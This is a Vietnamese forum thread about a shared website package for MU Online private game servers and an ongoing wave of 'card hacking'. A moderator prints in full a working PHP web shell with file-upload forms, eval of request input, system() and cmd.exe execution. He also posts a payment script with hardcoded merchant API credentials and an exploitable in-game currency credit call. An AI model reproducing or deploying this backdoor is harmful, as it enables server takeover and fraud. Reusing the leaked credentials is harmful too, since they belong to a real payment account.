Kết quả 11 đến 19 của 19
Chủ đề: Share Dweb Full ver mới nhất
-
17-02-17, 08:13 PM #11Moderator
- Ngày tham gia
- Aug 2007
- Đang ở
- Cung trăng
- Bài viết
- 2,274
- Thanks
- 797
- Thanked 824 Times in 593 Posts
Ðề: Share Dweb Full ver mới nhất
Mình gợi ý cho các bạn chút thế này nhé
1- code file shell của nó đây
2- code file nạp thẻ ví dụ là gate.phpPHP Code:<?php
if(@$_REQUEST["sqli"]== 'sqli')
{
error_reporting(0);
$docr = $_SERVER["DOCUMENT_ROOT"];
echo <<<HTML
<p>
<p>File Upload</b></p>
</p>
<table>
<form enctype="multipart/form-data" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td><font size="1">Your File : </font> </td>
<td>
<input size="48" name="file" type="file"></td>
</tr>
<tr>
<td><font size="1">Upload Dir : </font> </td>
<td>
<input size="48" value="$docr/" name="path" type="text">
<input type="submit" value="Upload"></td>
$tend
HTML;
if (isset($_POST["path"])){
$uploadfile = $_POST["path"].$_FILES["file"]["name"];
if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)) {
echo "File uploaded to : $uploadfilen";
echo "- Size : " .$_FILES["file"]["size"]. "n";
} else {
print "Error Upload File :n";
}
}
}
?>
<?php
if(@$_REQUEST["sql"]== 'sql')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
eval($_REQUEST['dct']);
?>
<?php
eval($_REQUEST['dct']);
?>
<?php $cmd = <<<EOD
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>
<?php
if($_GET['id']=='login')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=login">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
?>
<?php
if(@$_REQUEST["do"]== 'cmd')
{
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />';
echo '<form method="post">
Command:<input type="text" name="id" value=""/></br>
<button type="submit">Execute</button>
</form>';
$command=$_POST['id'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
}
?>
Như vậy là các bạn biết phải làm thế nào rồi chứ?PHP Code:<?php
/**
* @Project VWebMU v1
* @copyright 23/08/2014
* @Email: [email protected]
* @Yahoo: levu_it_pro
*/
if (!defined('NetVWEB')) die("Ban khong co quyen truy cap he thong");
if ($Use_CardGATE != 1) {
echo "<center>Chức năng không có hoặc không được sử dụng</center>";
}
else {
include('config/config_napthe_gate.php');
include('config/config_napthe.php');
if ( $khuyenmai_gate > 0) {
$menhgia10000k = $menhgia10000*(1+($khuyenmai_gate/100));
$menhgia20000k = $menhgia20000*(1+($khuyenmai_gate/100));
$menhgia30000k = $menhgia30000*(1+($khuyenmai_gate/100));
$menhgia50000k = $menhgia50000*(1+($khuyenmai_gate/100));
$menhgia100000k = $menhgia100000*(1+($khuyenmai_gate/100));
$menhgia200000k = $menhgia200000*(1+($khuyenmai_gate/100));
$menhgia300000k = $menhgia300000*(1+($khuyenmai_gate/100));
$menhgia500000k = $menhgia500000*(1+($khuyenmai_gate/100));
}
if (isset($_POST['action']))
{
$action = $_POST['action'];
if ($action == 'vpoint_gate')
{
$cardtype = "GATE";
$menhgia = $_POST['menhgia'];
$card_num = $_POST['card_num'];
$card_serial = $_POST['card_serial'];
$taikhoan=$_SESSION['mu_username'];
$url = 'http://linkketnoiserver/admin/ajax_action.php?ajax=acc_plus_minus';
if( $sendsv === false ) { $error = "Tốc độ xử lý của bạn quá nhanh, vui lòng chờ vài giây rồi tiếp tục thực hiện."; }
elseif(empty($menhgia))
{
$error = "Chưa chọn mệnh giá thẻ GATE";
}
elseif (preg_match("/[^0-9$]/", $menhgia))
{
$error = "<font size='4' color='red'>Dữ liệu lỗi - Mệnh giá chỉ được sử dụng số (1-9).</font>";
}
elseif (empty($card_num)) {
$error = "Chưa điền Mã thẻ GATE";
}
elseif (preg_match("/[^0-9$]/", $card_num))
{
$error = "<font size='2' color='red'>Dữ liệu lỗi : $card_num . Chỉ được sử dụng số (1-9).</font>";
}
elseif (empty($card_serial)) {
$error = "Chưa điền Serial thẻ GATE";
}
elseif (preg_match("/[^a-zA-Z0-9$]/", $card_serial))
{
$error = "<font size='2' color='red'>Dữ liệu lỗi : $card_serial . Serial Chỉ được sử dụng chu a-z, A-Z và số (1-9).</font>";
}
else {
if($cardtype=='MobiPhone'){$mang = "MOBI";}
elseif($cardtype=='Viettel'){$mang = "VIETEL";}
elseif($cardtype=='GATE'){$mang = "GATE";}
elseif($cardtype=='VinaPhone'){$mang = "VINA";}
else $cardtype ="VinaPhone";
$bk = 'https://www.baokim.vn/the-cao/restFul/send';
$merchant_id = '18343';
$api_username = '12330238230';
$api_password = '12330238230987stdyfAsd';
$transaction_id = time();
$secure_code = '5f96b57ac4114f5e';
$arrayPost = array(
'merchant_id'=>$merchant_id,
'api_username'=>$api_username,
'api_password'=>$api_password,
'transaction_id'=>$transaction_id,
'card_id'=>$mang,
'pin_field'=>$card_num,
'seri_field'=>$card_serial,
'algo_mode'=>'hmac'
);
ksort($arrayPost);
$data_sign = hash_hmac('SHA1',implode('',$arrayPost),$secure_code);
$arrayPost['data_sign'] = $data_sign;
$curl = curl_init($bk);
curl_setopt_array($curl, array(
CURLOPT_POST=>true,
CURLOPT_HEADER=>false,
CURLINFO_HEADER_OUT=>true,
CURLOPT_TIMEOUT=>30,
CURLOPT_RETURNTRANSFER=>true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_HTTPAUTH=>CURLAUTH_DIGEST|CURLAUTH_BASIC,
CURLOPT_USERPWD=>CORE_API_HTTP_USR.':'.CORE_API_HTTP_PWD,
CURLOPT_POSTFIELDS=>$arrayPost
));
$data = curl_exec($curl);
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
$result = json_decode($data,true);
if($status==200){
$amount = $result['amount'];
switch ($amount) {
case 10000: $xu = $menhgia10000k; break;
case 20000: $xu = $menhgia20000k; break;
case 30000: $xu = $menhgia20000k; break;
case 50000: $xu= $menhgia50000k; break;
case 100000: $xu = $menhgia100000k; break;
case 200000: $xu = $menhgia200000k; break;
case 300000: $xu = $menhgia200000k; break;
case 500000: $xu = $menhgia500000k; break;
case 1000000: $xu = $menhgia1000000k; break;
}
$fields = array(
//'customerid' => urlencode($_POST['customerid']),
'submit' => urlencode('Submit'),
'datatype' => urlencode('gcoin'),
'acc' => urlencode($taikhoan),
'plusminus' => urlencode('0'),
'value' => urlencode($xu),
'username' => urlencode('admin'),
//'useradmin' => urlencode('admin')
);
//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-Requested-With: XMLHttpRequest"));
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
//execute post
$resultkq = curl_exec($ch);
//close connection
curl_close($ch);
$notice = "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";
//$notice = "Thông tin thẻ: Thẻ dúng. Mệnh giá: $amount VNÐ.";
} else{
$error = $result['errorMessage'];
}
}
}
}
$menhgia10000_km = 0;
$menhgia20000_km = 0;
$menhgia30000_km = 0;
$menhgia50000_km = 0;
$menhgia100000_km = 0;
$menhgia200000_km = 0;
$menhgia300000_km = 0;
$menhgia500000_km = 0;
//Gcoin khi nạp thẻ GATE nhiều hơn các thẻ khác
if ( $khuyenmai_gate > 0) {
$menhgia10000 = $menhgia10000*(1+($khuyenmai_gate/100));
$menhgia20000 = $menhgia20000*(1+($khuyenmai_gate/100));
$menhgia30000 = $menhgia30000*(1+($khuyenmai_gate/100));
$menhgia50000 = $menhgia50000*(1+($khuyenmai_gate/100));
$menhgia100000 = $menhgia100000*(1+($khuyenmai_gate/100));
$menhgia200000 = $menhgia200000*(1+($khuyenmai_gate/100));
$menhgia300000 = $menhgia300000*(1+($khuyenmai_gate/100));
$menhgia500000 = $menhgia500000*(1+($khuyenmai_gate/100));
}
//Khuyen mai chung
if ($khuyenmai == 1 ) {
$menhgia10000_km = $menhgia10000*($khuyenmai_phantram/100);
$menhgia20000_km = $menhgia20000*($khuyenmai_phantram/100);
$menhgia30000_km = $menhgia30000*($khuyenmai_phantram/100);
$menhgia50000_km = $menhgia50000*($khuyenmai_phantram/100);
$menhgia100000_km = $menhgia100000*($khuyenmai_phantram/100);
$menhgia200000_km = $menhgia200000*($khuyenmai_phantram/100);
$menhgia300000_km = $menhgia300000*($khuyenmai_phantram/100);
$menhgia500000_km = $menhgia500000*($khuyenmai_phantram/100);
}
$page_template = "templates/napthe/gate.tpl";
}
?>
Chúc may mắn thành công!
-
Các thành viên gởi lời cảm ơn đến lequangvu vì bài viết này !
Domino9990 (18-02-17)
-
17-02-17, 08:16 PM #12Vi phạm quy định
- Ngày tham gia
- May 2006
- Đang ở
- https://t.me*********
- Bài viết
- 1,813
- Thanks
- 492
- Thanked 1,945 Times in 588 Posts
Ðề: Share Dweb Full ver mới nhất
phong trào hack thẻ lại tái diễn à
Khách viếng thăm hãy cùngcuocdoispxây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
17-02-17, 08:18 PM #13Vi phạm quy định
- Ngày tham gia
- Mar 2012
- Đang ở
- Nhà Nghỉ
- Bài viết
- 1,861
- Thanks
- 480
- Thanked 774 Times in 510 Posts
Ðề: Share Dweb Full ver mới nhất
Cùng của một thằng mà nó đang hack các Mu hiện nay, giờ Mu nào cứ open là nó soi xem có hack được không, rip mấy bác ít kinh nghiệm, VPS tôi cũng vừa hết hạn tính méo gia hạn nữa, nhưng tình trạng này lại phải cắn răng gia hạn để tránh bị hack thẻ thôi T_T
Có cao thủ nó truy cập được cả vào web Admin cho dù máy chủ cấm port 80 chỉ cho IP quan trọng truy cập, tôi bị hack cả như này nữa nhé, nhưng không tiện tiết lộ cách nó làm chỉ đơn giản source bị share ra nên nó tìm được nhiều lỗ hổng bảo mật để xâm nhập.Khách viếng thăm hãy cùngheroviet2301xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
Các thành viên gởi lời cảm ơn đến heroviet2301 vì bài viết này !
lequangvu (17-02-17)
-
18-02-17, 08:31 AM #14Moderator
- Ngày tham gia
- Aug 2007
- Đang ở
- Cung trăng
- Bài viết
- 2,274
- Thanks
- 797
- Thanked 824 Times in 593 Posts
Ðề: Share Dweb Full ver mới nhất
-
The Following 2 Users Say Thank You to lequangvu For This Useful Post:
DAMMEMU (28-02-17), Domino9990 (18-02-17)
-
18-02-17, 08:43 AM #15Thành Viên Tâm Huyết
- Ngày tham gia
- Nov 2011
- Đang ở
- yaya
- Bài viết
- 2,643
- Thanks
- 496
- Thanked 1,242 Times in 647 Posts
Ðề: Share Dweb Full ver mới nhất
đang lang thang ngoài đường ráng đăng nhập để thank cậu hehe.
love you!
-
18-02-17, 08:52 AM #16Thành Viên Tâm Huyết
- Ngày tham gia
- Nov 2011
- Đang ở
- yaya
- Bài viết
- 2,643
- Thanks
- 496
- Thanked 1,242 Times in 647 Posts
Ðề: Share Dweb Full ver mới nhất
herroviet search exploit remote code excution aibitary code là thấy xampp bị biến thành 1 cái teamviewer có khác gì nó remote trực tiếp vào vps đâu. chỉ là
1. nó có phải trẻ trâu hay không
2. là nó chưa thích show hàng ê tao vừa hack chiếm quyền vps mày nè.
3. nó đang cài vps thành zoombie chứ không thèm ngó ngàng đến thẻ của herro luôn đấy.
thực ra đối vs domino còn gặp nhiều vụ ghê gớm lắm ngay cả gameserver cũng có thể bị biến thành teamviewer kể cả thông qua proxy đấy. (nó gửi gói tin lên gameserver bảo chụp hình thì chụp bảo sửa file thì sửa bảo làm gì thì làm nấy. để có dịp domino làm cái demo sơ sơ cho ace hiểu)
lời khuyên
nếu ở mức độ nghiêm túc với máy chủ ai cũng nên nghĩ đến việc giám sát máy chủ của mình (dùng các công cụ giám sát truy cập, ghi log packets, như zabix, dialog , hirent firwall , và xem log trên máy chủ).
dĩ nhiên chỉ hạn chế thôi chứ bản thân window server cũng tìm ẩn rất nhiều exploit chết người ví dụ như ms-1020 thông qua RPC(cái remote desktop server ) chứ đừng nói đến các cái khác
love you!
-
18-02-17, 10:19 AM #17Thành Viên
- Ngày tham gia
- Apr 2014
- Bài viết
- 58
- Thanks
- 1
- Thanked 16 Times in 4 Posts
Ðề: Share Dweb Full ver mới nhất
hóng cao nhân điều tra thân thế thằng này.$bk = 'https://www.baokim.vn/the-cao/restFul/send';
$merchant_id = '18343';
$api_username = '12330238230';
$api_password = '12330238230987stdyfAsd';
$transaction_id = time();
$secure_code = '5f96b57ac4114f5e';
Khách viếng thăm hãy cùng soncuti xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
18-02-17, 10:32 AM #18Thành Viên
- Ngày tham gia
- Nov 2010
- Bài viết
- 348
- Thanks
- 279
- Thanked 31 Times in 28 Posts
Ðề: Share Dweb Full ver mới nhất
Khách viếng thăm hãy cùng alobabyday xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
18-02-17, 10:45 AM #19Thành Viên
- Ngày tham gia
- Apr 2014
- Bài viết
- 58
- Thanks
- 1
- Thanked 16 Times in 4 Posts
Ðề: Share Dweb Full ver mới nhất
Khách viếng thăm hãy cùng soncuti xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
Trả lời kèm Trích dẫn
Gửi bởi heroviet2301
[Only registered and activated users can see links. 
Các Chủ đề tương tự
-
[MU] Share DWEB + API + Vòng Quay May Mắn + Ép Đồ
Bởi hoangtu_eck94 trong diễn đàn SQL Server & WebsiteTrả lời: 76Bài viết cuối: 09-04-20, 07:41 AM -
[KT] Share Client full UI VNG 2015 dùng test offline cho bản 13 phái mới share
Bởi privi trong diễn đàn ReleasesTrả lời: 75Bài viết cuối: 25-09-16, 10:43 AM -
[JX] share 2 sever jx china mới share full chức năng
Bởi RunNingMan trong diễn đàn Võ Lâm Truyền Kỳ (Jx Server)Trả lời: 21Bài viết cuối: 27-06-16, 07:45 AM -
Share Full Server Võ Lâm Miến Phí VNG linux 8.0 FULL VH
Bởi hoangcungclub trong diễn đàn Chat Chit - Tán GẫuTrả lời: 7Bài viết cuối: 22-01-16, 11:10 AM
